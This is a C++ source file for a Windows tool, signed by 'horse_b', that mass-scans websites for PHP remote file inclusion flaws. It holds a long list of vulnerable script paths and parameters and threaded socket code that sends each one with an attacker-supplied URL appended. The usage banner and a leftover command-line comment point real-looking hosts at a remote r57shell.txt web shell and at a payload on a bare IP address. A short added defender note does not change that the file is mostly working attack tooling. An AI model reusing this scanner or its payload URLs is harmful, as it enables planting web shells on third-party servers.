📄 phpinclude.cpp
phpurl[407]="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
phpurl[408]="protection.php?siteurl=";
phpurl[409]="htmltonuke.php?filnavn=";
phpurl[410]="mail_autocheck.php?pm_path=";
phpurl[411]="index.php?p=";
phpurl[412]="modules/4nAlbum/public/displayCategory.php?basepath=";
phpurl[413]="e107/e107_handlers/secure_img_render.php?p=";
phpurl[414]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[415]="community/modules/agendax/addevent.inc.php?agendax_path=";
phpurl[416]="library/editor/editor.php?root=";
phpurl[417]="library/lib.php?root=";
phpurl[418]="zentrack/index.php?configFile=";
phpurl[419]="pivot/modules/module_db.php?pivot_path=";
phpurl[420]="myPHPCalendar/admin.php?cal_dir=";
phpurl[421]="index.php/main.php?x=";
phpurl[422]="os/pointer.php?url=";
phpurl[423]="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
phpurl[424]="db.php?path_local=";
phpurl[425]="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
phpurl[426]="index.php?kietu[url_hit]=";
phpurl[427]="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
phpurl[428]="Sources/Packages.php?sourcedir=";
phpurl[429]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
struct cgiurl myphp[43];
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(rmt_host_port);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
printf("website is shutdown....not support scan ....\n");
return 0;
}
memset(rbuff,0,1024);
send(sockfd,"HEAD / HTTP/1.0\n\n",sizeof("HEAD / HTTP/1.0\n\n"),0);
int e;
fd_set rd;
int recvn = 0;
FD_ZERO(&rd);
FD_SET(sockfd, &rd);
for(;;)
{
tv.tv_sec = 10;
tv.tv_usec = 0;
e = select(sockfd + 1, &rd, NULL, NULL, &tv);
if(e < 0 )continue;
else break;
}
if(e > 0 && FD_ISSET(sockfd, &rd) != 0)
{
recvn = recv(sockfd,rbuff,sizeof(rbuff),0);
if(recvn <= 0)
return 0;
}
//printf("***************************>recv size(buff) = %d\n",recvn);
closesocket(sockfd);
for(int i=0;i<43;i++)
{
HANDLE Thread[10];
for(int j=0;j<10;j++)
{
myphp[j].rmt_host=rmt_host;
myphp[j].rmt_wwwhost = rmt_wwwhost;
char tmpdir[4096] = "\0";
sprintf(tmpdir,"%s%s",phpurl[i*10+j],myphptrojandir);
myphp[j].url=tmpdir;
if(vebose > 0)
{
sprintf(holetmp,"<%s> %s \n",rmt_wwwhost,tmpdir);
printf(holetmp);
}
myphp[j].n=j;
myphp[j].rmt_port = rmt_host_port;
myphp[j].vebose = vebose;
DWORD dwThreadId[10];
Thread[j] = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)GetPhpInc, (LPVOID)&myphp[j],0,&dwThreadId[i]);
if(NULL == Thread[j])
{
printf("!! createthread %d:%ld error !!\n", i, dwThreadId[i]);
}
else
{
//printf("create thread %d:%ld ok.\n", i, dwThreadId[i]);
}
Sleep(1);
}
//WaitForMultipleObjects(10,&Thread[j],TRUE,480000);
for(int x = 0; x<10; x+=MAXIMUM_WAIT_OBJECTS)
{
int count = 10 -x > MAXIMUM_WAIT_OBJECTS ? MAXIMUM_WAIT_OBJECTS: 10 -x;
DWORD dwWait = WaitForMultipleObjects(
count ,
&Thread[x],
TRUE,
INFINITE);
printf("wait status for: %d-%d, dwWait: %ld\n",x, x+count, dwWait);
}
}
printf("scan %d vulu,find %d vulu,exit,bye,code by horse_b\n",countvulscan,findok);
return 0;
}
/*
 * Print the built-in usage banner to stdout.
 *
 * The example line shows the four options main() parses: -h (host name),
 * -p (port), -u (a remote URL) and -v (verbosity).
 *
 * Defender note: the scan routine earlier in this file appends the -u value
 * to each candidate "file.php?param=" string. The request pattern to alert
 * on is therefore an absolute http:// URL arriving in a path- or
 * include-style query parameter. Disabling remote includes in PHP
 * (allow_url_include=Off) removes the underlying weakness.
 */
void helpme()
{
    static const char *const banner[] = {
        "/////////////////////www.horseb.org////////////////////////////////\n",
        "phpinclude.exe -hwww.phpbbs.net -p80 -uhttp://www.horseb.net/r57shell.txt? -v0\n",
        "//////////////////////www.horseb.net///////////////////////////////\n",
    };
    const unsigned int lines = sizeof(banner) / sizeof(banner[0]);

    /* None of the banner lines contains a conversion, so "%s" emits them verbatim. */
    for (unsigned int k = 0; k < lines; ++k)
    {
        printf("%s", banner[k]);
    }
}
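/*
 * Resolve a host name to a dotted-quad IPv4 string using DnsQuery_A.
 *
 * wwwxshellsrv  host name to look up.
 * xwrong        out: set to 1 on success, -1 on any failure.
 *
 * Returns a pointer to static storage: inet_ntoa()'s internal buffer on
 * success, or the fixed string "0.0.0.0" on failure. The caller must copy
 * the text before the next inet_ntoa() call and must not free it. The
 * function never returns NULL, so callers that copy the result immediately
 * cannot dereference a null pointer.
 *
 * Fixes relative to the previous version:
 *  - pDnsRecord is initialised, so the failure path no longer inspects an
 *    indeterminate pointer;
 *  - the failure path frees the record list when it is non-NULL (the old
 *    test was inverted and only "freed" a NULL list);
 *  - a NULL result from inet_ntoa() is mapped to "0.0.0.0" instead of being
 *    returned to a caller that strcpy()s it;
 *  - the never-assigned pSrvList, its LocalFree() calls and the unused
 *    resip buffer are gone; NULL is passed for the extra-servers argument
 *    exactly as before.
 *
 * NOTE(review): the head record is read through Data.A without checking its
 * wType, so this assumes the first record in the answer is an A record.
 */
char* MyQuery(char *wwwxshellsrv,int& xwrong)
{
    static char unresolved[] = "0.0.0.0";
    PDNS_RECORD pDnsRecord = NULL;

    DNS_STATUS status = DnsQuery_A(wwwxshellsrv, DNS_TYPE_A,
                                   DNS_QUERY_ACCEPT_TRUNCATED_RESPONSE,
                                   NULL, &pDnsRecord, NULL);
    if (status != ERROR_SUCCESS || pDnsRecord == NULL)
    {
        xwrong = -1;
        if (pDnsRecord != NULL)
        {
            DnsRecordListFree(pDnsRecord, DnsFreeRecordListDeep);
        }
        return unresolved;
    }

    /* Copy the address out before releasing the record list that owns it. */
    IN_ADDR ipaddr;
    ipaddr.S_un.S_addr = pDnsRecord->Data.A.IpAddress;
    DnsRecordListFree(pDnsRecord, DnsFreeRecordListDeep);

    /* Convert once; inet_ntoa() hands back its own static buffer. */
    char *dotted = inet_ntoa(ipaddr);
    if (dotted == NULL)
    {
        xwrong = -1;
        return unresolved;
    }

    xwrong = 1;
    return dotted;
}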
//H:\研究\phpinclude\Release>phpinclude -hwww.linktrust.com.cn -p80 -uhttp://123.112.19.10/c2007.txt? -v1
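/* Copy src into dst (capacity cap bytes), always NUL-terminating and never writing past cap. */
static void copy_bounded(char *dst, size_t cap, const char *src)
{
    if (dst == NULL || cap == 0)
    {
        return;
    }
    if (src == NULL)
    {
        dst[0] = '\0';
        return;
    }
    strncpy(dst, src, cap - 1);
    dst[cap - 1] = '\0';   /* strncpy does not terminate when src fills the buffer */
}

/* Parse a whole-string base-10 integer; return fallback on empty, trailing-junk or out-of-int input. */
static int parse_int_or(const char *text, int fallback)
{
    if (text == NULL)
    {
        return fallback;
    }
    char *end = NULL;
    long value = strtol(text, &end, 10);
    if (end == text || *end != '\0')
    {
        return fallback;
    }
    int narrowed = (int)value;
    if ((long)narrowed != value)
    {
        return fallback;
    }
    return narrowed;
}

/*
 * Entry point: parse -h/-p/-u/-v, resolve the host name, initialise Winsock,
 * log the start marker and hand the parsed values to StartScan().
 *
 * Always returns 0, as the original did.
 *
 * Fixes relative to the previous version:
 *  - command-line strings are copied with an explicit bound; the old
 *    sprintf(buf, "%s", optarg) overflowed the 1024-byte stack buffers on a
 *    long argument;
 *  - the try/catch blocks around atoi() were dead code (atoi never throws),
 *    so the intended defaults (port 80, verbosity 1) were never applied;
 *    input is now validated with strtol() and the port is range-checked;
 *  - too few arguments prints the usage text and stops instead of carrying
 *    on with empty settings;
 *  - the resolver result is checked before it is copied, not after;
 *  - case 'v' has its own break; the unused locals are removed.
 */
int main(int argc,char** argv)
{
    char rmt_host[1024] = "\0";
    char rmt_wwwhost[1024] = "\0";
    char myphptrojan[1024] = "\0";
    int rmt_port = 0;
    int vorbose = 0;

    if (argc < 5)
    {
        helpme();
        return 0;
    }

    for (;;)
    {
        int c = getopt(argc, argv, "h:p:u:v:");
        if (c == -1)
        {
            break;
        }
        switch (c)
        {
        case 'h':
            copy_bounded(rmt_wwwhost, sizeof(rmt_wwwhost), optarg);
            break;
        case 'p':
            rmt_port = parse_int_or(optarg, 80);
            if (rmt_port < 1 || rmt_port > 65535)
            {
                rmt_port = 80;   /* not a usable TCP port: fall back to the default */
            }
            break;
        case 'u':
            copy_bounded(myphptrojan, sizeof(myphptrojan), optarg);
            break;
        case 'v':
            vorbose = parse_int_or(optarg, 1);
            break;
        default:
            break;
        }
    }

    /* Resolve the host name to an IP address. */
    int xwrong = -1;
    char *resolved = MyQuery(rmt_wwwhost, xwrong);   /* yields "0.0.0.0" when resolution fails */
    if (xwrong < 0 || resolved == NULL)
    {
        return 0;
    }
    copy_bounded(rmt_host, sizeof(rmt_host), resolved);

    WSAData GInitData;
    if (WSAStartup(MAKEWORD(2,1),&GInitData) != 0)
    {
        printf("初始化SOCKET函数失败!\n");
        return 0;
    }

    SaveLog("start scan ------------------------------------\r\n");
    StartScan(rmt_host,rmt_wwwhost,rmt_port,myphptrojan,vorbose);
    //getchar();
    WSACleanup();
    return (0);
}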